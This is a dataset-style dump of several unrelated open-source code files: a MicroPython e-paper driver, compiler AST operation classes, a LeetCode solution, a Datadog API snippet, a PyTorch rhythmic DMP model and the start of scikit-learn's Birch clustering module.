IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# also works for black/white/yellow GDEW0213C38?
from micropython import const
from time import sleep_ms
import ustruct
# Display resolution
EPD_WIDTH = const(104)
EPD_HEIGHT = const(212)
# Display commands
PANEL_SETTING = const(0x00)
POWER_SETTING = const(0x01)
POWER_OFF = const(0x02)
#POWER_OFF_SEQUENCE_SETTING = const(0x03)
POWER_ON = const(0x04)
#POWER_ON_MEASURE = const(0x05)
BOOSTER_SOFT_START = const(0x06)
#DEEP_SLEEP = const(0x07)
DATA_START_TRANSMISSION_1 = const(0x10)
#DATA_STOP = const(0x11)
DISPLAY_REFRESH = const(0x12)
DATA_START_TRANSMISSION_2 = const(0x13)
#VCOM_LUT = const(0x20) # VCOM LUT(LUTC) (45-byte command, structure of bytes 2~7 repeated)
#W2W_LUT = const(0x21) # W2W LUT (LUTWW) (43-byte command, structure of bytes 2~7 repeated 7 times)
#B2W_LUT = const(0x22) # B2W LUT (LUTBW / LUTR) (43-byte command, structure of bytes 2~7 repeated 7 times)
#W2B_LUT = const(0x23) # W2B LUT (LUTWB / LUTW) (43-byte command, structure of bytes 2~7 repeated 7 times)
#B2B_LUT = const(0x24) # B2B LUT (LUTBB / LUTB) (43-byte command, sturcture of bytes 2~7 repeated 7 times)
#PLL_CONTROL = const(0x30)
#TEMPERATURE_SENSOR_CALIBRATION = const(0x40)
#TEMPERATURE_SENSOR_SELECTION = const(0x41)
#TEMPERATURE_SENSOR_WRITE = const(0x42)
#TEMPERATURE_SENSOR_READ = const(0x43)
VCOM_AND_DATA_INTERVAL_SETTING = const(0x50)
#LOW_POWER_DETECTION = const(0x51)
#TCON_SETTING = const(0x60)
RESOLUTION_SETTING = const(0x61)
#GET_STATUS = const(0x71) # partial update status, i2c status, data received, power status, busy
#AUTO_MEASURE_VCOM = const(0x80)
#VCOM_VALUE = const(0x81)
VCM_DC_SETTING_REGISTER = const(0x82)
#PARTIAL_WINDOW = const(0x90)
#PARTIAL_IN = const(0x91)
#PARTIAL_OUT = const(0x92)
#PROGRAM_MODE = const(0xA0)
#ACTIVE_PROGRAM = const(0xA1)
#READ_OTP_DATA = const(0xA2)
#POWER_SAVING = const(0xE3)
# Display orientation
ROTATE_0 = const(0)
ROTATE_90 = const(1)
ROTATE_180 = const(2)
ROTATE_270 = const(3)
BUSY = const(0) # 0=busy, 1=idle
class EPD:
def __init__(self, spi, cs, dc, rst, busy):
self.spi = spi
self.cs = cs
self.dc = dc
self.rst = rst
self.busy = busy
self.cs.init(self.cs.OUT, value=1)
self.dc.init(self.dc.OUT, value=0)
self.rst.init(self.rst.OUT, value=0)
self.busy.init(self.busy.IN)
self.width = EPD_WIDTH
self.height = EPD_HEIGHT
self.rotate = ROTATE_0
def _command(self, command, data=None):
self.dc(0)
self.cs(0)
self.spi.write(bytearray([command]))
self.cs(1)
if data is not None:
self._data(data)
def _data(self, data):
self.dc(1)
self.cs(0)
self.spi.write(data)
self.cs(1)
def init(self):
self.reset()
self._command(BOOSTER_SOFT_START, b'\x17\x17\x17')
self._command(POWER_ON)
self.wait_until_idle()
self._command(PANEL_SETTING, b'\x8F') # (128x296, LUT from OTP, B/W/R, scan up, shift right, booster on)
self._command(VCOM_AND_DATA_INTERVAL_SETTING, b'\x37')
self._command(RESOLUTION_SETTING, ustruct.pack(">BH", EPD_WIDTH, EPD_HEIGHT))
def wait_until_idle(self):
while self.busy.value() == BUSY:
sleep_ms(100)
def reset(self):
self.rst(0)
sleep_ms(200)
self.rst(1)
sleep_ms(200)
def display_frame(self, frame_buffer_black, frame_buffer_red):
if (frame_buffer_black != None):
self._command(DATA_START_TRANSMISSION_1)
sleep_ms(2)
for i in range(0, self.width * self.height // 8):
self._data(bytearray([frame_buffer_black[i]]))
sleep_ms(2)
if (frame_buffer_red != None):
self._command(DATA_START_TRANSMISSION_2)
sleep_ms(2)
for i in range(0, self.width * self.height // 8):
self._data(bytearray([frame_buffer_red[i]]))
sleep_ms(2)
self._command(DISPLAY_REFRESH)
self.wait_until_idle()
def set_rotate(self, rotate):
if (rotate == ROTATE_0):
self.rotate = ROTATE_0
self.width = EPD_WIDTH
self.height = EPD_HEIGHT
elif (rotate == ROTATE_90):
self.rotate = ROTATE_90
self.width = EPD_HEIGHT
self.height = EPD_WIDTH
elif (rotate == ROTATE_180):
self.rotate = ROTATE_180
self.width = EPD_WIDTH
self.height = EPD_HEIGHT
elif (rotate == ROTATE_270):
self.rotate = ROTATE_270
self.width = EPD_HEIGHT
self.height = EPD_WIDTH
def set_pixel(self, frame_buffer, x, y, colored):
if (x < 0 or x >= self.width or y < 0 or y >= self.height):
return
if (self.rotate == ROTATE_0):
self.set_absolute_pixel(frame_buffer, x, y, colored)
elif (self.rotate == ROTATE_90):
point_temp = x
x = EPD_WIDTH - y
y = point_temp
self.set_absolute_pixel(frame_buffer, x, y, colored)
elif (self.rotate == ROTATE_180):
x = EPD_WIDTH - x
y = EPD_HEIGHT- y
self.set_absolute_pixel(frame_buffer, x, y, colored)
elif (self.rotate == ROTATE_270):
point_temp = x
x = y
y = EPD_HEIGHT - point_temp
self.set_absolute_pixel(frame_buffer, x, y, colored)
def set_absolute_pixel(self, frame_buffer, x, y, colored):
# To avoid display orientation effects
# use EPD_WIDTH instead of self.width
# use EPD_HEIGHT instead of self.height
if (x < 0 or x >= EPD_WIDTH or y < 0 or y >= EPD_HEIGHT):
return
if (colored):
frame_buffer[(x + y * EPD_WIDTH) // 8] &= ~(0x80 >> (x % 8))
else:
frame_buffer[(x + y * EPD_WIDTH) // 8] |= 0x80 >> (x % 8)
def draw_string_at(self, frame_buffer, x, y, text, font, colored):
image = Image.new('1', (self.width, self.height))
draw = ImageDraw.Draw(image)
draw.text((x, y), text, font = font, fill = 255)
# Set buffer to value of Python Imaging Library image.
# Image must be in mode 1.
pixels = image.load()
for y in range(self.height):
for x in range(self.width):
# Set the bits for the column of pixels at the current position.
if pixels[x, y] != 0:
self.set_pixel(frame_buffer, x, y, colored)
def draw_line(self, frame_buffer, x0, y0, x1, y1, colored):
# Bresenham algorithm
dx = abs(x1 - x0)
sx = 1 if x0 < x1 else -1
dy = -abs(y1 - y0)
sy = 1 if y0 < y1 else -1
err = dx + dy
while((x0 != x1) and (y0 != y1)):
self.set_pixel(frame_buffer, x0, y0 , colored)
if (2 * err >= dy):
err += dy
x0 += sx
if (2 * err <= dx):
err += dx
y0 += sy
def draw_horizontal_line(self, frame_buffer, x, y, width, colored):
for i in range(x, x + width):
self.set_pixel(frame_buffer, i, y, colored)
def draw_vertical_line(self, frame_buffer, x, y, height, colored):
for i in range(y, y + height):
self.set_pixel(frame_buffer, x, i, colored)
def draw_rectangle(self, frame_buffer, x0, y0, x1, y1, colored):
min_x = x0 if x1 > x0 else x1
max_x = x1 if x1 > x0 else x0
min_y = y0 if y1 > y0 else y1
max_y = y1 if y1 > y0 else y0
self.draw_horizontal_line(frame_buffer, min_x, min_y, max_x - min_x + 1, colored)
self.draw_horizontal_line(frame_buffer, min_x, max_y, max_x - min_x + 1, colored)
self.draw_vertical_line(frame_buffer, min_x, min_y, max_y - min_y + 1, colored)
self.draw_vertical_line(frame_buffer, max_x, min_y, max_y - min_y + 1, colored)
def draw_filled_rectangle(self, frame_buffer, x0, y0, x1, y1, colored):
min_x = x0 if x1 > x0 else x1
max_x = x1 if x1 > x0 else x0
min_y = y0 if y1 > y0 else y1
max_y = y1 if y1 > y0 else y0
for i in range(min_x, max_x + 1):
self.draw_vertical_line(frame_buffer, i, min_y, max_y - min_y + 1, colored)
def draw_circle(self, frame_buffer, x, y, radius, colored):
# Bresenham algorithm
x_pos = -radius
y_pos = 0
err = 2 - 2 * radius
if (x >= self.width or y >= self.height):
return
while True:
self.set_pixel(frame_buffer, x - x_pos, y + y_pos, colored)
self.set_pixel(frame_buffer, x + x_pos, y + y_pos, colored)
self.set_pixel(frame_buffer, x + x_pos, y - y_pos, colored)
self.set_pixel(frame_buffer, x - x_pos, y - y_pos, colored)
e2 = err
if (e2 <= y_pos):
y_pos += 1
err += y_pos * 2 + 1
if(-x_pos == y_pos and e2 <= x_pos):
e2 = 0
if (e2 > x_pos):
x_pos += 1
err += x_pos * 2 + 1
if x_pos > 0:
break
def draw_filled_circle(self, frame_buffer, x, y, radius, colored):
# Bresenham algorithm
x_pos = -radius
y_pos = 0
err = 2 - 2 * radius
if (x >= self.width or y >= self.height):
return
while True:
self.set_pixel(frame_buffer, x - x_pos, y + y_pos, colored)
self.set_pixel(frame_buffer, x + x_pos, y + y_pos, colored)
self.set_pixel(frame_buffer, x + x_pos, y - y_pos, colored)
self.set_pixel(frame_buffer, x - x_pos, y - y_pos, colored)
self.draw_horizontal_line(frame_buffer, x + x_pos, y + y_pos, 2 * (-x_pos) + 1, colored)
self.draw_horizontal_line(frame_buffer, x + x_pos, y - y_pos, 2 * (-x_pos) + 1, colored)
e2 = err
if (e2 <= y_pos):
y_pos += 1
err += y_pos * 2 + 1
if(-x_pos == y_pos and e2 <= x_pos):
e2 = 0
if (e2 > x_pos):
x_pos += 1
err += x_pos * 2 + 1
if x_pos > 0:
break
# to wake call reset() or init()
def sleep(self):
self._command(VCOM_AND_DATA_INTERVAL_SETTING, b'\x37')
self._command(VCM_DC_SETTING_REGISTER, b'\x00') # to solve Vcom drop
self._command(POWER_SETTING, b'\x02\x00\x00\x00') # gate switch to external
self.wait_until_idle()
self._command(POWER_OFF)
| 40.88746 | 130 | 0.566609 |
795c7aef00580472613173046e8e36975db6952f | 7,105 | py | Python | Proyecto/compilation/ast/operations.py | leynier/IA-Sim-Com | f6e99bb1aa4b02d5d558dc76a9bf802c3761e428 | [
"MIT"
] | null | null | null | Proyecto/compilation/ast/operations.py | leynier/IA-Sim-Com | f6e99bb1aa4b02d5d558dc76a9bf802c3761e428 | [
"MIT"
] | 1 | 2022-02-11T07:26:54.000Z | 2022-02-11T07:26:54.000Z | Proyecto/compilation/ast/operations.py | leynier/IA-Sim-Com | f6e99bb1aa4b02d5d558dc76a9bf802c3761e428 | [
"MIT"
] | null | null | null | from compilation.errors import Error, CheckTypesError
from compilation.ast.nodes import Node
from compilation.context import Context
def is_error(value: Error) -> bool:
return isinstance(value, Error)
def numbertype(type_):
if type_ == "int" or type_ == "double":
return True
def is_number(value) -> bool:
return isinstance(value, int) or isinstance(value, float)
def is_bool(value: bool) -> bool:
return isinstance(value, bool)
def same_type(value_1, value_2) -> bool:
return isinstance(value_1, type(value_2))
class Op(Node):
def __init__(self, right_node: Node):
self.right_node = right_node
def eval(self, variables: dict):
return None
def __repr__(self) -> str:
return "{}({})".format(self.type(), self.right_node)
@staticmethod
def type() -> str:
return "OP"
class BinOp(Op): # @@
def __init__(self, left_node: Node, right_node: Node):
super().__init__(right_node)
self.left_node = left_node
self.token = None
def validate(self, context: Context):
validationNodeLeft = self.left_node.validate(context)
validationNodeRight = self.right_node.validate(context)
if not isinstance(validationNodeLeft, bool):
return validationNodeLeft
if not isinstance(validationNodeRight, bool):
return validationNodeRight
return True
def checktype(self, context: Context):
typeLeft = self.left_node.checktype(context)
typeRight = self.right_node.checktype(context)
if isinstance(typeLeft, CheckTypesError):
return typeLeft
if isinstance(typeRight, CheckTypesError):
return typeRight
if numbertype(typeLeft) and numbertype(typeRight):
if typeLeft == typeRight:
if typeLeft == "int":
return "int"
else:
return "double"
else:
return "double"
else:
return CheckTypesError("You cannot operate arithmetically with tokens that are not of type number", "",
self.token.line, self.token.column)
def __repr__(self) -> str:
return "{}({}, {})".format(self.type(), self.left_node, self.right_node)
@staticmethod
def type() -> str:
return "BIN_OP"
class AddOp(BinOp):
def __init__(self, left_node: Node, right_node: Node):
super().__init__(left_node, right_node)
def eval(self, context: Context):
exprNI = self.left_node.eval(context)
if isinstance(exprNI, RuntimeError):
return exprNI
exprND = self.right_node.eval(context)
if isinstance(exprND, RuntimeError):
return exprND
return exprNI + exprND
@staticmethod
def type() -> str:
return "ADD"
class ArOp(BinOp):
def __init__(self, left_node: Node, right_node: Node):
super().__init__(left_node, right_node)
@staticmethod
def type() -> str:
return "AR_OP"
class SubOp(ArOp):
def __init__(self, left_node: Node, right_node: Node):
super().__init__(left_node, right_node)
def eval(self, context: Context):
exprNI = self.left_node.eval(context)
if isinstance(exprNI, RuntimeError):
return exprNI
exprND = self.right_node.eval(context)
if isinstance(exprND, RuntimeError):
return exprND
return exprNI - exprND
@staticmethod
def type() -> str:
return "SUB"
class MulOp(BinOp):
def __init__(self, left_node: Node, right_node: Node):
super().__init__(left_node, right_node)
def eval(self, context: Context):
exprNI = self.left_node.eval(context)
if isinstance(exprNI, RuntimeError):
return exprNI
exprND = self.right_node.eval(context)
if isinstance(exprND, RuntimeError):
return exprND
return exprNI * exprND
@staticmethod
def type() -> str:
return "MUL"
class DivOp(ArOp):
def __init__(self, left_node: Node, right_node: Node):
super().__init__(left_node, right_node)
self.token = None
def eval(self, context: Context):
evaluatenoderight = self.right_node.eval(context)
if isinstance(evaluatenoderight, RuntimeError):
return evaluatenoderight
evaluatenodeleft = self.left_node.eval(context)
if isinstance(evaluatenodeleft, RuntimeError):
return evaluatenodeleft
if evaluatenoderight != 0:
return evaluatenodeleft / evaluatenoderight
else:
return RuntimeError("division by zero", "", self.token.line, self.token.column)
@staticmethod
def type() -> str:
return "DIV"
class ModOp(DivOp):
def __init__(self, left_node: Node, right_node: Node):
super().__init__(left_node, right_node)
self.token = None
def eval(self, context: Context):
evaluatenoderight = self.right_node.eval(context)
if isinstance(evaluatenoderight, RuntimeError):
return evaluatenoderight
evaluatenodeleft = self.left_node.eval(context)
if isinstance(evaluatenodeleft, RuntimeError):
return evaluatenodeleft
if evaluatenoderight != 0:
return evaluatenodeleft % evaluatenoderight
else:
return RuntimeError("division by zero", "", self.token.line, self.token.column)
@staticmethod
def type() -> str:
return "MOD"
class ExpOp(ArOp):
def __init__(self, left_node: Node, right_node: Node):
super().__init__(left_node, right_node)
def eval(self, context: Context):
exprNI = self.left_node.eval(context)
if isinstance(exprNI, RuntimeError):
return exprNI
exprND = self.right_node.eval(context)
if isinstance(exprND, RuntimeError):
return exprND
return exprNI ** exprND
@staticmethod
def type() -> str:
return "EXP"
class BoolOp(BinOp):
def __init__(self, left_node: Node, right_node: Node):
super().__init__(left_node, right_node)
@staticmethod
def type() -> str:
return "BOOL_OP"
class AndOp(BoolOp):
def __init__(self, left_node: Node, right_node: Node):
super().__init__(left_node, right_node)
def eval(self, context: Context):
return self.left_node and self.right_node
@staticmethod
def type() -> str:
return "AND"
class OrOp(BoolOp):
def __init__(self, left_node: Node, right_node: Node):
super().__init__(left_node, right_node)
def eval(self, context: Context):
return self.left_node or self.right_node
@staticmethod
def type() -> str:
return "OR"
class XorOp(BoolOp):
def __init__(self, left_node: Node, right_node: Node):
super().__init__(left_node, right_node)
def eval(self, context: Context):
return self.left_node ^ self.right_node
@staticmethod
def type() -> str:
return "XOR"
| 27.862745 | 115 | 0.629557 |
795c7af8c47f7bb298a1f427249732569a868fde | 296 | py | Python | Leetcode/0372. Super Pow/0372.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | Leetcode/0372. Super Pow/0372.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | Leetcode/0372. Super Pow/0372.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | class Solution:
def superPow(self, a: int, b: List[int]) -> int:
def powMod(x: int, y: int) -> int:
pow = 1
for _ in range(y):
pow = (pow * x) % k
return pow
k = 1337
ans = 1
for i in b:
ans = powMod(ans, 10) * powMod(a, i) % k
return ans
| 18.5 | 50 | 0.486486 |
795c7cf365cf44fe50777f5bee588f0ba9626ed9 | 348 | py | Python | ja/code_snippets/api-embeds-revoke.py | quotecenter/documentation-1 | f365703264761aa2b19d5d1d8ec55a3a6082ef4d | [
"BSD-3-Clause"
] | null | null | null | ja/code_snippets/api-embeds-revoke.py | quotecenter/documentation-1 | f365703264761aa2b19d5d1d8ec55a3a6082ef4d | [
"BSD-3-Clause"
] | null | null | null | ja/code_snippets/api-embeds-revoke.py | quotecenter/documentation-1 | f365703264761aa2b19d5d1d8ec55a3a6082ef4d | [
"BSD-3-Clause"
] | null | null | null | from datadog import initialize, api
# Intialize request parameters including API/APP key
options = {
'api_key': '<YOUR_API_KEY>',
'app_key': '<YOUR_APP_KEY>'
}
initialize(**options)
# Set Embed ID (token)
embed_id = "5f585b01c81b12ecdf5f40df0382738d0919170639985d3df5e2fc4232865b0c"
# Call Embed API function
api.Embed.revoke(embed_id)
| 21.75 | 77 | 0.761494 |
795c7d38804abdd49d2b717f49aa1387e89d26d0 | 4,728 | py | Python | pyrobolearn/models/dmp/dmpytorch/rhythmic_dmp.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | [
"Apache-2.0"
] | 2 | 2021-01-21T21:08:30.000Z | 2022-03-29T16:45:49.000Z | pyrobolearn/models/dmp/dmpytorch/rhythmic_dmp.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | [
"Apache-2.0"
] | null | null | null | pyrobolearn/models/dmp/dmpytorch/rhythmic_dmp.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | [
"Apache-2.0"
] | 1 | 2020-09-29T21:25:39.000Z | 2020-09-29T21:25:39.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Define the rhythmic dynamic movement primitive.
"""
import numpy as np
import torch
from pyrobolearn.models.dmp.dmpytorch.canonical_systems import RhythmicCS
from pyrobolearn.models.dmp.dmpytorch.forcing_terms import RhythmicForcingTerm
from pyrobolearn.models.dmp.dmpytorch.dmp import DMP
__author__ = "Brian Delhaisse"
__copyright__ = "Copyright 2018, PyRoboLearn"
__credits__ = ["Brian Delhaisse"]
__license__ = "GNU GPLv3"
__version__ = "1.0.0"
__maintainer__ = "Brian Delhaisse"
__email__ = "briandelhaisse@gmail.com"
__status__ = "Development"
class RhythmicDMP(DMP):
r"""Rhythmic Dynamic Movement Primitive
Rhythmic DMPs have the same mathematical formulation as general DMPs, which is given by:
.. math:: \tau^2 \ddot{y} = K (g - y) - D \tau \dot{y} + f(s)
where :math:`\tau` is a scaling factor that allows to slow down or speed up the reproduced movement, :math:`K`
is the stiffness coefficient, :math:`D` is the damping coefficient, :math:`y, \dot{y}, \ddot{y}` are the position,
velocity, and acceleration of a DoF, and :math:`f(s)` is the non-linear forcing term.
However, the forcing term in the case of rhythmic DMPs is given by:
.. math:: f(s) = \frac{\sum_i \psi_i(s) w_i}{\sum_i \psi_i(s)} a
where :math:`w` are the learnable weight parameters, and :math:`\psi` are the basis functions evaluated at the
given input phase variable :math:`s`, and :math:`a` is the amplitude.
The basis functions (in the rhythmic case) are given by:
.. math:: \psi_i(s) = \exp \left( - h_i (\cos(s - c_i) - 1) \right)
where :math:`c_i` is the center of the basis, and :math:`h_i` is a measure of concentration.
Also, the canonical system associated with this transformation system is given by:
.. math:: \tau \dot{s} = 1
where :math:`\tau` is a scaling factor that allows to slow down or speed up the movement, and :math:`s` is the
phase variable that drives the DMP.
All these differential equations are solved using Euler's method.
References:
[1] "Dynamical movement primitives: Learning attractor models for motor behaviors", Ijspeert et al., 2013
"""
def __init__(self, num_dmps, num_basis, dt=0.01, y0=0, goal=1,
forces=None, stiffness=None, damping=None):
"""Initialize the rhythmic DMP
Args:
num_dmps (int): number of DMPs
num_basis (int): number of basis functions
dt (float): step integration for Euler's method
y0 (float, np.array): initial position(s)
goal (float, np.array): goal(s)
forces (list, ForcingTerm): the forcing terms (which can have different basis functions)
stiffness (float): stiffness coefficient
damping (float): damping coefficient
"""
# create rhythmic canonical system
cs = RhythmicCS(dt=dt)
# create forcing terms (each one contains the basis functions and learnable weights)
if forces is None:
if isinstance(num_basis, int):
forces = [RhythmicForcingTerm(cs, num_basis) for _ in range(num_dmps)]
else:
if not isinstance(num_basis, (np.ndarray, list, tuple, set)):
raise TypeError("Expecting 'num_basis' to be an int, list, tuple, np.array or set.")
if len(num_basis) != num_dmps:
raise ValueError("The length of th list of number of basis doesn't match the number of DMPs")
forces = [RhythmicForcingTerm(cs, n_basis) for n_basis in num_basis]
# call super class constructor
super(RhythmicDMP, self).__init__(canonical_system=cs, forces=forces, y0=y0, goal=goal,
stiffness=stiffness, damping=damping)
def get_scaling_term(self, new_goal=None):
"""
Return the scaling term for the forcing term. For rhythmic DMPs it's non-diminishing, so this function just
returns 1.
"""
return torch.ones(self.num_dmps)
def _generate_goal(self, y_des):
"""Generate the goal for path imitation.
For rhythmic DMPs, the goal is the average of the desired trajectory.
Args:
y_des (float[M,T]): the desired trajectory to follow (with shape [num_dmps, timesteps])
Returns:
float[M]: goal positions (one for each DMP)
"""
goal = np.zeros(self.num_dmps)
for n in range(self.num_dmps):
num_idx = ~torch.isnan(y_des[n]) # ignore nan's when calculating goal
goal[n] = .5 * (y_des[n, num_idx].min() + y_des[n, num_idx].max())
return goal
| 40.758621 | 118 | 0.648689 |
795c7d7f54ec0dc0adbbebaf28a5070c47bb922b | 25,555 | py | Python | sklearn/cluster/_birch.py | melkisedeath/scikit-learn | 74a37de119d2c7c9ea1cce673c2ee207541a55d2 | [
"BSD-3-Clause"
] | 3 | 2021-02-04T16:57:23.000Z | 2021-02-24T13:44:51.000Z | sklearn/cluster/_birch.py | melkisedeath/scikit-learn | 74a37de119d2c7c9ea1cce673c2ee207541a55d2 | [
"BSD-3-Clause"
] | null | null | null | sklearn/cluster/_birch.py | melkisedeath/scikit-learn | 74a37de119d2c7c9ea1cce673c2ee207541a55d2 | [
"BSD-3-Clause"
] | 1 | 2019-04-18T16:25:21.000Z | 2019-04-18T16:25:21.000Z | # Authors: Manoj Kumar <manojkumarsivaraj334@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Joel Nothman <joel.nothman@gmail.com>
# License: BSD 3 clause
import warnings
import numbers
import numpy as np
from scipy import sparse
from math import sqrt
from ..metrics import pairwise_distances_argmin
from ..metrics.pairwise import euclidean_distances
from ..base import TransformerMixin, ClusterMixin, BaseEstimator
from ..utils.extmath import row_norms
from ..utils import deprecated
from ..utils.validation import check_is_fitted, _deprecate_positional_args
from ..exceptions import ConvergenceWarning
from . import AgglomerativeClustering
from .._config import config_context
def _iterate_sparse_X(X):
"""This little hack returns a densified row when iterating over a sparse
matrix, instead of constructing a sparse matrix for every row that is
expensive.
"""
n_samples = X.shape[0]
X_indices = X.indices
X_data = X.data
X_indptr = X.indptr
for i in range(n_samples):
row = np.zeros(X.shape[1])
startptr, endptr = X_indptr[i], X_indptr[i + 1]
nonzero_indices = X_indices[startptr:endptr]
row[nonzero_indices] = X_data[startptr:endptr]
yield row
def _split_node(node, threshold, branching_factor):
"""The node has to be split if there is no place for a new subcluster
in the node.
1. Two empty nodes and two empty subclusters are initialized.
2. The pair of distant subclusters are found.
3. The properties of the empty subclusters and nodes are updated
according to the nearest distance between the subclusters to the
pair of distant subclusters.
4. The two nodes are set as children to the two subclusters.
"""
new_subcluster1 = _CFSubcluster()
new_subcluster2 = _CFSubcluster()
new_node1 = _CFNode(
threshold=threshold, branching_factor=branching_factor,
is_leaf=node.is_leaf,
n_features=node.n_features)
new_node2 = _CFNode(
threshold=threshold, branching_factor=branching_factor,
is_leaf=node.is_leaf,
n_features=node.n_features)
new_subcluster1.child_ = new_node1
new_subcluster2.child_ = new_node2
if node.is_leaf:
if node.prev_leaf_ is not None:
node.prev_leaf_.next_leaf_ = new_node1
new_node1.prev_leaf_ = node.prev_leaf_
new_node1.next_leaf_ = new_node2
new_node2.prev_leaf_ = new_node1
new_node2.next_leaf_ = node.next_leaf_
if node.next_leaf_ is not None:
node.next_leaf_.prev_leaf_ = new_node2
dist = euclidean_distances(
node.centroids_, Y_norm_squared=node.squared_norm_, squared=True)
n_clusters = dist.shape[0]
farthest_idx = np.unravel_index(
dist.argmax(), (n_clusters, n_clusters))
node1_dist, node2_dist = dist[(farthest_idx,)]
node1_closer = node1_dist < node2_dist
for idx, subcluster in enumerate(node.subclusters_):
if node1_closer[idx]:
new_node1.append_subcluster(subcluster)
new_subcluster1.update(subcluster)
else:
new_node2.append_subcluster(subcluster)
new_subcluster2.update(subcluster)
return new_subcluster1, new_subcluster2
class _CFNode:
"""Each node in a CFTree is called a CFNode.
The CFNode can have a maximum of branching_factor
number of CFSubclusters.
Parameters
----------
threshold : float
Threshold needed for a new subcluster to enter a CFSubcluster.
branching_factor : int
Maximum number of CF subclusters in each node.
is_leaf : bool
We need to know if the CFNode is a leaf or not, in order to
retrieve the final subclusters.
n_features : int
The number of features.
Attributes
----------
subclusters_ : list
List of subclusters for a particular CFNode.
prev_leaf_ : _CFNode
Useful only if is_leaf is True.
next_leaf_ : _CFNode
next_leaf. Useful only if is_leaf is True.
the final subclusters.
init_centroids_ : ndarray of shape (branching_factor + 1, n_features)
Manipulate ``init_centroids_`` throughout rather than centroids_ since
the centroids are just a view of the ``init_centroids_`` .
init_sq_norm_ : ndarray of shape (branching_factor + 1,)
manipulate init_sq_norm_ throughout. similar to ``init_centroids_``.
centroids_ : ndarray of shape (branching_factor + 1, n_features)
View of ``init_centroids_``.
squared_norm_ : ndarray of shape (branching_factor + 1,)
View of ``init_sq_norm_``.
"""
def __init__(self, *, threshold, branching_factor, is_leaf, n_features):
self.threshold = threshold
self.branching_factor = branching_factor
self.is_leaf = is_leaf
self.n_features = n_features
# The list of subclusters, centroids and squared norms
# to manipulate throughout.
self.subclusters_ = []
self.init_centroids_ = np.zeros((branching_factor + 1, n_features))
self.init_sq_norm_ = np.zeros((branching_factor + 1))
self.squared_norm_ = []
self.prev_leaf_ = None
self.next_leaf_ = None
def append_subcluster(self, subcluster):
n_samples = len(self.subclusters_)
self.subclusters_.append(subcluster)
self.init_centroids_[n_samples] = subcluster.centroid_
self.init_sq_norm_[n_samples] = subcluster.sq_norm_
# Keep centroids and squared norm as views. In this way
# if we change init_centroids and init_sq_norm_, it is
# sufficient,
self.centroids_ = self.init_centroids_[:n_samples + 1, :]
self.squared_norm_ = self.init_sq_norm_[:n_samples + 1]
def update_split_subclusters(self, subcluster,
new_subcluster1, new_subcluster2):
"""Remove a subcluster from a node and update it with the
split subclusters.
"""
ind = self.subclusters_.index(subcluster)
self.subclusters_[ind] = new_subcluster1
self.init_centroids_[ind] = new_subcluster1.centroid_
self.init_sq_norm_[ind] = new_subcluster1.sq_norm_
self.append_subcluster(new_subcluster2)
def insert_cf_subcluster(self, subcluster):
"""Insert a new subcluster into the node."""
if not self.subclusters_:
self.append_subcluster(subcluster)
return False
threshold = self.threshold
branching_factor = self.branching_factor
# We need to find the closest subcluster among all the
# subclusters so that we can insert our new subcluster.
dist_matrix = np.dot(self.centroids_, subcluster.centroid_)
dist_matrix *= -2.
dist_matrix += self.squared_norm_
closest_index = np.argmin(dist_matrix)
closest_subcluster = self.subclusters_[closest_index]
# If the subcluster has a child, we need a recursive strategy.
if closest_subcluster.child_ is not None:
split_child = closest_subcluster.child_.insert_cf_subcluster(
subcluster)
if not split_child:
# If it is determined that the child need not be split, we
# can just update the closest_subcluster
closest_subcluster.update(subcluster)
self.init_centroids_[closest_index] = \
self.subclusters_[closest_index].centroid_
self.init_sq_norm_[closest_index] = \
self.subclusters_[closest_index].sq_norm_
return False
# things not too good. we need to redistribute the subclusters in
# our child node, and add a new subcluster in the parent
# subcluster to accommodate the new child.
else:
new_subcluster1, new_subcluster2 = _split_node(
closest_subcluster.child_, threshold, branching_factor)
self.update_split_subclusters(
closest_subcluster, new_subcluster1, new_subcluster2)
if len(self.subclusters_) > self.branching_factor:
return True
return False
# good to go!
else:
merged = closest_subcluster.merge_subcluster(
subcluster, self.threshold)
if merged:
self.init_centroids_[closest_index] = \
closest_subcluster.centroid_
self.init_sq_norm_[closest_index] = \
closest_subcluster.sq_norm_
return False
# not close to any other subclusters, and we still
# have space, so add.
elif len(self.subclusters_) < self.branching_factor:
self.append_subcluster(subcluster)
return False
# We do not have enough space nor is it closer to an
# other subcluster. We need to split.
else:
self.append_subcluster(subcluster)
return True
class _CFSubcluster:
"""Each subcluster in a CFNode is called a CFSubcluster.
A CFSubcluster can have a CFNode has its child.
Parameters
----------
linear_sum : ndarray of shape (n_features,), default=None
Sample. This is kept optional to allow initialization of empty
subclusters.
Attributes
----------
n_samples_ : int
Number of samples that belong to each subcluster.
linear_sum_ : ndarray
Linear sum of all the samples in a subcluster. Prevents holding
all sample data in memory.
squared_sum_ : float
Sum of the squared l2 norms of all samples belonging to a subcluster.
centroid_ : ndarray of shape (branching_factor + 1, n_features)
Centroid of the subcluster. Prevent recomputing of centroids when
``CFNode.centroids_`` is called.
child_ : _CFNode
Child Node of the subcluster. Once a given _CFNode is set as the child
of the _CFNode, it is set to ``self.child_``.
sq_norm_ : ndarray of shape (branching_factor + 1,)
Squared norm of the subcluster. Used to prevent recomputing when
pairwise minimum distances are computed.
"""
def __init__(self, *, linear_sum=None):
if linear_sum is None:
self.n_samples_ = 0
self.squared_sum_ = 0.0
self.centroid_ = self.linear_sum_ = 0
else:
